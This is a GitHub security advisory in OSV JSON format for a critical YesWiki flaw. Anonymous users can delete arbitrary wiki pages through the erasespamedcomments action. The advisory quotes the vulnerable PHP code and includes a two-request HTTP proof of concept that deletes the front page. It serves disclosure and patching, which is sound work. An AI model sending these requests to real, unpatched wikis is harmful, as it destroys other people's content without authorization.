{"id":"GHSA-6x7x-gcmf-7r8x","summary":"YesWiki vulnerable to unauthenticated arbitrary page deletion via `{{erasespamedcomments}}` action","details":"### Summary\n\nThe `{{erasespamedcomments}}` wiki action (`actions/EraseSpamedCommentsAction.php`) accepts a `suppr[]` array from `POST` and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (`default_write_acl='*'`) on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users.\n\nThe action's `delete()` callee is `PageManager::deleteOrphaned()`, which despite its name does not check whether the target page is orphaned: it issues an unconditional `DELETE` against `pages`, `links`, `acls`, `triples`, `referrers`, and `tags` tables.\n\n### Details\n\nThree issues compose the vulnerability.\n\n1. `actions/EraseSpamedCommentsAction.php` performs no authorization check before processing `$_POST['clean']` / `$_POST['suppr'][]` in `actions/EraseSpamedCommentsAction.php`:\n\n   ```php\n   public function run()\n   {\n       $wiki = &$this-\u003ewiki;\n       ob_start();\n       // ...\n       elseif (isset($_POST['clean'])) {              \n           $deletedPages = '';\n           if (!empty($_POST['suppr'])) {            \n               foreach ($_POST['suppr'] as $page) {\n                   echo 'Effacement de : ' . $page . \"\u003cbr /\u003e\\n\";\n                   if ($wiki-\u003eservices-\u003eget(PageController::class)-\u003edelete($page)) {  \n                       $deletedPages .= $page . ', ';\n                   }\n               }\n           }\n           \n       }\n   }\n   ```\n\n   No `UserIsAdmin()`, no `UserIsOwner()`, no `HasAccess('write', $page)` per-target check, no CSRF token check.\n\n2. The default action ACL grants access to everyone in `includes/YesWiki.php`:\n\n   ```php\n   $acl = empty($this-\u003econfig['permissions'][$moduleType][$module])\n       ? '*'\n       : $this-\u003econfig['permissions'][$moduleType][$module];\n   ```\n\n   ```php\n   if ($acl === null) { return true; }\n   return $this-\u003eCheckACL($acl, $user);\n   ```\n\n   No shipped `permissions` map gates `erasespamedcomments` to admins, so `Performer::CheckModuleACL('erasespamedcomments', 'action')` returns `true` for anonymous users.\n\n3. `PageController::delete()` and `PageManager::deleteOrphaned()` perform no authorization check and do not validate that the page is actually orphaned in `includes/controllers/PageController.php:38–48`:\n\n   ```php\n   public function delete(string $tag): bool\n   {\n       if ($this-\u003eentryManager-\u003eisEntry($tag)) {\n           return $this-\u003eentryController-\u003edelete($tag);\n       } else {\n           $this-\u003epageManager-\u003edeleteOrphaned($tag);\n           $this-\u003ewiki-\u003eLogAdministrativeAction(\n               $this-\u003eauthController-\u003egetLoggedUserName(),\n               'Suppression de la page -\u003e\"\"' . $tag . '\"\"'\n           );\n           return true;\n       }\n   }\n   ```\nin `includes/services/PageManager.php:289–310`:\n   ```php\n   public function deleteOrphaned($tag)\n   {\n       if ($this-\u003esecurityController-\u003eisWikiHibernated()) { throw new \\Exception(_t('WIKI_IN_HIBERNATION')); }\n       unset($this-\u003eownersCache[$tag]);\n       if (in_array($tag, $this-\u003epageCache)) { unset($this-\u003epageCache[$tag]); }\n       $this-\u003edbService-\u003equery(\"DELETE FROM ... WHERE tag='{$this-\u003edbService-\u003eescape($tag)}' OR comment_on='{$this-\u003edbService-\u003eescape($tag)}'\");\n       $this-\u003edbService-\u003equery(\"DELETE FROM ...links... WHERE from_tag='{$this-\u003edbService-\u003eescape($tag)}' \");\n       $this-\u003edbService-\u003equery(\"DELETE FROM ...acls... WHERE page_tag='{$this-\u003edbService-\u003eescape($tag)}' \");\n       // ...further unconditional DELETEs across triples, referrers, tags\n   }\n   ```\n\n   The companion `isOrphaned()` method (line 284) exists but is never called from `deleteOrphaned()`. The function name is misleading as it deletes any page, not just orphans.\n\n### PoC\n\nDefault fresh install where `default_write_acl='*'` (per `includes/YesWikiInit.php:219`), anonymous browsing.\n\n1. create a trigger page (anonymous)\n\n```http\nPOST /?wiki=SpamCleanup/edit HTTP/1.1\nHost: target.example\nContent-Type: application/x-www-form-urlencoded\n\nbody=%7B%7Berasespamedcomments%7D%7D&submit=1\n```\n\nThis succeeds because the new page passes `aclService-\u003ehasAccess('write', 'SpamCleanup')` against `default_write_acl='*'`.\n\n2. trigger arbitrary page deletion (anonymous)\n\n```http\nPOST /?wiki=SpamCleanup HTTP/1.1\nHost: target.example\nContent-Type: application/x-www-form-urlencoded\n\nclean=yes&suppr%5B0%5D=PagePrincipale&suppr%5B1%5D=AnotherTargetPage\n```\n\nServer response includes `Effacement de : PagePrincipale` and `Effacement de : AnotherTargetPage`. `pages`, `links`, `acls`, `triples`, `referrers`, and `tags` rows for those tags are deleted from the database.\n\n### Impact\n\n Arbitrary page deletion, including the front page (`PagePrincipale`).","aliases":["CVE-2026-52766"],"modified":"2026-07-09T21:11:39.436131Z","published":"2026-07-09T20:57:25Z","database_specific":{"cwe_ids":["CWE-276","CWE-862"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-07-09T20:57:25Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/YesWiki/yeswiki/security/advisories/GHSA-6x7x-gcmf-7r8x"},{"type":"WEB","url":"https://github.com/YesWiki/yeswiki/commit/ed5b548a705c8091ba0282aaaba73ddda976abef"},{"type":"PACKAGE","url":"https://github.com/YesWiki/yeswiki"}],"affected":[{"package":{"name":"yeswiki/yeswiki","ecosystem":"Packagist","purl":"pkg:composer/yeswiki/yeswiki"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.6.6"}]}],"versions":["4.2.3","v4.1.0","v4.1.1","v4.1.2","v4.1.3","v4.1.4","v4.1.5","v4.2.0","v4.2.1","v4.2.2","v4.2.4","v4.3","v4.3.1","v4.4.0","v4.4.1","v4.4.2","v4.4.3","v4.4.4","v4.4.5","v4.5.0","v4.5.1","v4.5.2","v4.5.3","v4.5.4","v4.5.5","v4.6.0","v4.6.1","v4.6.2","v4.6.3","v4.6.4","v4.6.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-6x7x-gcmf-7r8x/GHSA-6x7x-gcmf-7r8x.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}]}